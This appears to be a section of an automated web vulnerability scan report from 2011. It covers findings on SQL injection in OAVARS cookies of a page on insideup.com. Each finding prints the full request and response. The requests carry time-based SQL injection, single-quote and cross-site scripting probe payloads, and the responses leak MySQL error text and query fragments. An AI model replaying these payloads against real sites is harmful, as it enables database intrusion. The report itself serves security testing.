Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.87. http://www.insideup.com/ppc/leadflow/caad00/project.php [OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E] cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D'; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=epo9po6akii3rg00eaobgqc6u2; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.88. http://www.insideup.com/ppc/leadflow/caad00/project.php [OAVARS[%27] cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The OAVARS[%27] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[%27] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D'; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2kt2vvhd1hsgd8cr7vii2e0go5; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.89. http://www.insideup.com/ppc/leadflow/caad00/project.php [OAVARS[//netsparker.com/n/n.css?0x001190] cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The OAVARS[//netsparker.com/n/n.css?0x001190] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[//netsparker.com/n/n.css?0x001190] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D'; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mohr5c82mrioh2ih5uks9f4cp0; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.90. http://www.insideup.com/ppc/leadflow/caad00/project.php [OAVARS[] cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The OAVARS[<script>ns(0x001197)</script>] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[<script>ns(0x001197)</script>] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 